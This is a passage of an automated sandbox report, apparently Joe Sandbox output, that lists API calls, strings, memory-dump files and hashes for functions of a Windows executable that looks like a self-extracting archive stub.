Download Yara Rule

APIs

Part of subcall function 00007FF7C0189254: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7C0189389

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7C018A375
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018A82F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C018A835

Part of subcall function 00007FF7C019033C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7C0189CBA), ref: 00007FF7C0190369

Strings

@%s:, xrefs: 00007FF7C018A357
MENU, xrefs: 00007FF7C018A1D9
$%s:, xrefs: 00007FF7C018A350
DIRECTION, xrefs: 00007FF7C018A1E5
RTL, xrefs: 00007FF7C018A32E
STRINGS, xrefs: 00007FF7C018A1C1
*messages***, xrefs: 00007FF7C0189FC6
DIALOG, xrefs: 00007FF7C018A1CD
, xrefs: 00007FF7C018A1F9
*messages***, xrefs: 00007FF7C018A004
,, xrefs: 00007FF7C018A3AA

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
API String ID: 3629253777-3268106645
Opcode ID: 87966f23d4e29822f34e3fcc0e0a882ae27015c9125862882d54e96057c8a0e0
Instruction ID: b5513aeeefdb0aadd1fe9aa70a870b67a897153905d1d9a4f36a37dcd14e097c
Opcode Fuzzy Hash: 87966f23d4e29822f34e3fcc0e0a882ae27015c9125862882d54e96057c8a0e0
Instruction Fuzzy Hash: D2629E62A19B8297EB10EF24E4441ADE3A5FB40BA4FC54231DA4D87795EF3CF644C3A1

Function 00007FF7C01A3030 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 285
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32 ref: 00007FF7C01A3297
IsWindowVisible.USER32 ref: 00007FF7C01A32C7
ShowWindow.USER32 ref: 00007FF7C01A32D6
WaitForInputIdle.USER32 ref: 00007FF7C01A32E7
GetExitCodeProcess.KERNEL32 ref: 00007FF7C01A330D
CloseHandle.KERNEL32 ref: 00007FF7C01A3337
ShowWindow.USER32 ref: 00007FF7C01A338F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A344B

Strings

Install, xrefs: 00007FF7C01A31D4
.exe, xrefs: 00007FF7C01A3342
p, xrefs: 00007FF7C01A3079
.inf, xrefs: 00007FF7C01A31C5

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_invalid_parameter_noinfo_noreturn
String ID: .exe$.inf$Install$p
API String ID: 148627002-3607691742
Opcode ID: 7ff84cc4936af5bcef10331d165799f6bfe69847ad0aaccc2564c490b21f0d06
Instruction ID: e6c9df9321e0324041a059a3403a25f30df28a7527592d9eda0e690ad3523c6b
Opcode Fuzzy Hash: 7ff84cc4936af5bcef10331d165799f6bfe69847ad0aaccc2564c490b21f0d06
Instruction Fuzzy Hash: DFC16062B1C68286EA14EF25F54427DE3A1EF85FA0F844035EA4D877A4DF3CF56583A0

Function 00007FF7C01A2BF4 Relevance: 16.6, APIs: 11, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7C019E96C: PeekMessageW.USER32 ref: 00007FF7C019E982
Part of subcall function 00007FF7C019E96C: GetMessageW.USER32 ref: 00007FF7C019E999
Part of subcall function 00007FF7C019E96C: IsDialogMessageW.USER32 ref: 00007FF7C019E9B0
Part of subcall function 00007FF7C019E96C: TranslateMessage.USER32 ref: 00007FF7C019E9BF
Part of subcall function 00007FF7C019E96C: DispatchMessageW.USER32 ref: 00007FF7C019E9CA

GetDlgItem.USER32 ref: 00007FF7C01A2C33
ShowWindow.USER32 ref: 00007FF7C01A2C59
IsDlgButtonChecked.USER32 ref: 00007FF7C01A2C6E
IsDlgButtonChecked.USER32 ref: 00007FF7C01A2C86
IsDlgButtonChecked.USER32 ref: 00007FF7C01A2CA7
IsDlgButtonChecked.USER32 ref: 00007FF7C01A2CC3
IsDlgButtonChecked.USER32 ref: 00007FF7C01A2D06
IsDlgButtonChecked.USER32 ref: 00007FF7C01A2D24
IsDlgButtonChecked.USER32 ref: 00007FF7C01A2D38
IsDlgButtonChecked.USER32 ref: 00007FF7C01A2D62
IsDlgButtonChecked.USER32 ref: 00007FF7C01A2D7A

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
String ID:
API String ID: 4119318379-0
Opcode ID: 5ff2d565dfc5db30faf5757a2f3953a4f42f62c0c62e185934d8e45e8a36dc63
Instruction ID: c7b90c7fb0f257cbc7da54723310aeb5b4da01d170b4b53c9d3a82363bb01e0a
Opcode Fuzzy Hash: 5ff2d565dfc5db30faf5757a2f3953a4f42f62c0c62e185934d8e45e8a36dc63
Instruction Fuzzy Hash: AB41F235B1465287F710AF61F804BADA360EB49FA8F804135DE1A87B99CF3DF54987A0

Function 00007FF7C019218C Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 7
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00007FF7C0192197

Strings

z01, xrefs: 00007FF7C0192E00
zipx, xrefs: 00007FF7C0192F30
zx01, xrefs: 00007FF7C0192DF9
zip, xrefs: 00007FF7C0192F37
map/set too long, xrefs: 00007FF7C0192190
AES-0017, xrefs: 00007FF7C0192803

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_
String ID: AES-0017$map/set too long$z01$zip$zipx$zx01
API String ID: 909987262-704999473
Opcode ID: 279821ddad5ca0a3171316fe86be340fa28ecb032434c2a7f18e4b4bd5f06c06
Instruction ID: 12f8903f7242fc5884e4ba327b78b9701756075e9dc1f9de2585acaf61885941
Opcode Fuzzy Hash: 279821ddad5ca0a3171316fe86be340fa28ecb032434c2a7f18e4b4bd5f06c06
Instruction Fuzzy Hash: 3DB0921890810A82D12CBE80A841068D3109B14B10ED00C3082188AA620B28705242A2

Function 00007FF7C01846A0 Relevance: 9.2, APIs: 6, Instructions: 164
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF7C018477B
GetLastError.KERNEL32 ref: 00007FF7C018478E
CreateFileW.KERNEL32 ref: 00007FF7C01847EE
GetLastError.KERNEL32 ref: 00007FF7C01847F7
SetFileTime.KERNEL32 ref: 00007FF7C01848A9
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0184916

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3536497005-0
Opcode ID: f2a95c046f384fb88cb42bad2343db76857be23356c2a59daf525ee97aa7854a
Instruction ID: 2d2be3891b4bc1b4be7087b5669da3efa8aac66355d728dbebf3e28b70f1a2a6
Opcode Fuzzy Hash: f2a95c046f384fb88cb42bad2343db76857be23356c2a59daf525ee97aa7854a
Instruction Fuzzy Hash: F961F262A0878187E720AF69F44036EE7A1BB85BB8F500324DFA943BD4DF3CE1548790

Function 00007FF7C018E7C0 Relevance: 9.1, APIs: 6, Instructions: 80
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToFileTime.KERNEL32 ref: 00007FF7C018E824

Part of subcall function 00007FF7C0186768: GetVersionExW.KERNEL32 ref: 00007FF7C0186799

LocalFileTimeToFileTime.KERNEL32 ref: 00007FF7C018E846
FileTimeToSystemTime.KERNEL32 ref: 00007FF7C018E852
TzSpecificLocalTimeToSystemTime.KERNELBASE ref: 00007FF7C018E862
SystemTimeToFileTime.KERNEL32 ref: 00007FF7C018E870
SystemTimeToFileTime.KERNEL32 ref: 00007FF7C018E87E

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 7415bec7d798ad501b197d19bbfbfb4fb824aa0f8bac73e46940edbbb5db9b65
Instruction ID: ff55755c83c6dfc813d4e9cce33a703095942d814b03c9a5a21242c087326ae0
Opcode Fuzzy Hash: 7415bec7d798ad501b197d19bbfbfb4fb824aa0f8bac73e46940edbbb5db9b65
Instruction Fuzzy Hash: DE314C62B10651DEFB00DFB5E8901ACB770FB08B68B94502AEE0D97B58EF38E595C750

Function 00007FF7C01A3810 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNEL32 ref: 00007FF7C01A3847
SetEnvironmentVariableW.KERNELBASE ref: 00007FF7C01A38C0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A391F

Strings

sfxpar, xrefs: 00007FF7C01A38B9
sfxcmd, xrefs: 00007FF7C01A3840

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
String ID: sfxcmd$sfxpar
API String ID: 3540648995-3493335439
Opcode ID: 5a57c69db1c650ffc0109058ee75098a0d594147db01f3cd247ccf932cb967a8
Instruction ID: eead23c469451fdabfbcc2a2cff229655315505558af4a2def74dbcff605a7b5
Opcode Fuzzy Hash: 5a57c69db1c650ffc0109058ee75098a0d594147db01f3cd247ccf932cb967a8
Instruction Fuzzy Hash: E4316062A18B4585EF04AF65F4841ACE371EB44FA8F840235EE1D97BA9DF3CE151C3A0

Function 00007FF7C019EB64 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadBitmapW.USER32 ref: 00007FF7C019EB7A
GetObjectW.GDI32 ref: 00007FF7C019EBAB
DeleteObject.GDI32 ref: 00007FF7C019EBE5
DeleteObject.GDI32 ref: 00007FF7C019EC15

Part of subcall function 00007FF7C019C260: FindResourceW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7C01A4517), ref: 00007FF7C019C279
Part of subcall function 00007FF7C019C260: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7C01A4517), ref: 00007FF7C019C295
Part of subcall function 00007FF7C019C260: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7C01A4517), ref: 00007FF7C019C2AF
Part of subcall function 00007FF7C019C260: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF7C01A4517), ref: 00007FF7C019C2C1
Part of subcall function 00007FF7C019C260: GlobalAlloc.KERNELBASE ref: 00007FF7C019C2E2
Part of subcall function 00007FF7C019C260: GlobalLock.KERNEL32 ref: 00007FF7C019C2F7
Part of subcall function 00007FF7C019C260: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF7C019C3A5
Part of subcall function 00007FF7C019C260: GlobalUnlock.KERNEL32 ref: 00007FF7C019C3C8
Part of subcall function 00007FF7C019C260: GlobalFree.KERNEL32 ref: 00007FF7C019C3D1

Strings

], xrefs: 00007FF7C019EBB3

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
String ID: ]
API String ID: 1428510222-3352871620
Opcode ID: 4bf2bc35f3b21ea03de476389abc0e83db34e9447328c44d88c742213a9449e8
Instruction ID: 775e4e932fe155a53995b36b26a7a7306e07fc8236afa4181b79d0619ae85cfb
Opcode Fuzzy Hash: 4bf2bc35f3b21ea03de476389abc0e83db34e9447328c44d88c742213a9449e8
Instruction Fuzzy Hash: DF113021A0D64687EA14BF51F65427DD2D3AF89FE0F880034D95E87B8ADF2CF50486A0

Function 00007FF7C01A3928 Relevance: 7.5, APIs: 5, Instructions: 29
windowsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32 ref: 00007FF7C01A3945
GetMessageW.USER32 ref: 00007FF7C01A395C
TranslateMessage.USER32 ref: 00007FF7C01A3967
DispatchMessageW.USER32 ref: 00007FF7C01A3972
WaitForSingleObject.KERNEL32 ref: 00007FF7C01A3980

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: Message$DispatchObjectPeekSingleTranslateWait
String ID:
API String ID: 3621893840-0
Opcode ID: c630aa0803547081c4d72855550468f4e84ba9b42f5c9c7b8480925491db25bb
Instruction ID: 773891a58f13baf687f93e6eba4342e9de7c3abd5edac5de2d4ab9cebe3ac6b2
Opcode Fuzzy Hash: c630aa0803547081c4d72855550468f4e84ba9b42f5c9c7b8480925491db25bb
Instruction Fuzzy Hash: E7F04F62B2849683F750AF20F459B7EE211EFE4F15FC41034EA5E81A949F2CE149CB60

Function 00007FF7C019E96C Relevance: 7.5, APIs: 5, Instructions: 27
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32 ref: 00007FF7C019E982
GetMessageW.USER32 ref: 00007FF7C019E999
IsDialogMessageW.USER32 ref: 00007FF7C019E9B0
TranslateMessage.USER32 ref: 00007FF7C019E9BF
DispatchMessageW.USER32 ref: 00007FF7C019E9CA

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: e45bfd896b69646a0b5eeb10867a712a562e5ff66da3ebe7d8c5d592be84918c
Instruction ID: 6a873102e9d667f498d0ea343d1acd71319f63c73c169488799409e377d6ec0d
Opcode Fuzzy Hash: e45bfd896b69646a0b5eeb10867a712a562e5ff66da3ebe7d8c5d592be84918c
Instruction Fuzzy Hash: 4EF0E126A3855283EB50AF60F859A7EE351FFD4F15FC45035EA4E81A54DF2CE108C750

Function 00007FF7C01953BC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C019568F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0195695

Part of subcall function 00007FF7C0186288: FindClose.KERNELBASE(?,?,?,00007FF7C018FFA5), ref: 00007FF7C01862BD

Part of subcall function 00007FF7C0191DD0: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7C0191E25

Strings

zipx, xrefs: 00007FF7C01954BC
zip, xrefs: 00007FF7C01954C3

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseFindswprintf
String ID: zip$zipx
API String ID: 2713956076-1268445101
Opcode ID: 0c43c1b66e07d995b1cbb6a2f2b962e78e60540c5e6c8088aa3c6015e6fa861f
Instruction ID: abbe9c401b81fade7faceed6f644be7757a54b178f7845eb62654494d9dc3700
Opcode Fuzzy Hash: 0c43c1b66e07d995b1cbb6a2f2b962e78e60540c5e6c8088aa3c6015e6fa861f
Instruction Fuzzy Hash: 40816A62B08A0287FB10AF65B4445ACE3A2AB45FB4FD04235DE2DA7795DF3CB045C3A0

Function 00007FF7C019CE24 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetClassNameW.USER32 ref: 00007FF7C019CE4D
SHAutoComplete.SHLWAPI ref: 00007FF7C019CE91

Part of subcall function 00007FF7C0190AA0: CompareStringW.KERNEL32(?,?,00007FF7C0186C19), ref: 00007FF7C0190ABF

FindWindowExW.USER32 ref: 00007FF7C019CE7B

Strings

EDIT, xrefs: 00007FF7C019CE57, 00007FF7C019CE6F

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 97649a043c3252f54d481027b362a8cb3c0219486fdf1255c1e6258ed32498fa
Instruction ID: 2c62d141ffa786ad3e2e3168f4367ba235127cdd3a98abad73aa826cd9bf48c6
Opcode Fuzzy Hash: 97649a043c3252f54d481027b362a8cb3c0219486fdf1255c1e6258ed32498fa
Instruction Fuzzy Hash: 4801FF61B18A4683FA20AF21F8247AEE391AF98F64FC45035CD4D87755EF2CF148C6A0

Function 00007FF7C0184E18 Relevance: 6.1, APIs: 4, Instructions: 136fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF7C0184E5A
WriteFile.KERNEL32 ref: 00007FF7C0184EA4
WriteFile.KERNELBASE ref: 00007FF7C0184ED2

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 407f625d59d604b924eb6a4f57d6f6a75d77dcc3e5834d4536d90adbb701eae7
Instruction ID: 347d5e6e37ee9fce699eb7fd2206744b543728cb2f8b794006dad46d0fc8b42e
Opcode Fuzzy Hash: 407f625d59d604b924eb6a4f57d6f6a75d77dcc3e5834d4536d90adbb701eae7
Instruction Fuzzy Hash: 6751D462A1964283EA10AF15F44477EE360BB44FB4F810235EA5D86B90DF6CF684C791

Function 00007FF7C0190120 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32 ref: 00007FF7C01A3E0E
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A3E79
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A3E7F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A3E85

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ItemText
String ID:
API String ID: 3750147219-0
Opcode ID: 50b89a8270df903bc8d53bcbbcc158286c6a4e06f2f404c7bb081b93efef60e5
Instruction ID: 6e43a0ac1747f862967e5d9d19b0719b2ad054fdbdd7be9b6a5fd6b04da09bd1
Opcode Fuzzy Hash: 50b89a8270df903bc8d53bcbbcc158286c6a4e06f2f404c7bb081b93efef60e5
Instruction Fuzzy Hash: 14518062B1879186FA00AFA4E4453ACE362AB44FB4FD00635EA1C977D6DF6CF55083A0

Function 00007FF7C0185C60 Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,00000000,?,00007FF7C0185671), ref: 00007FF7C0185CAA
CreateDirectoryW.KERNEL32 ref: 00007FF7C0185D0F
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,00007FF7C0185671), ref: 00007FF7C0185D6D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0185DAA

Memory Dump Source

Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true

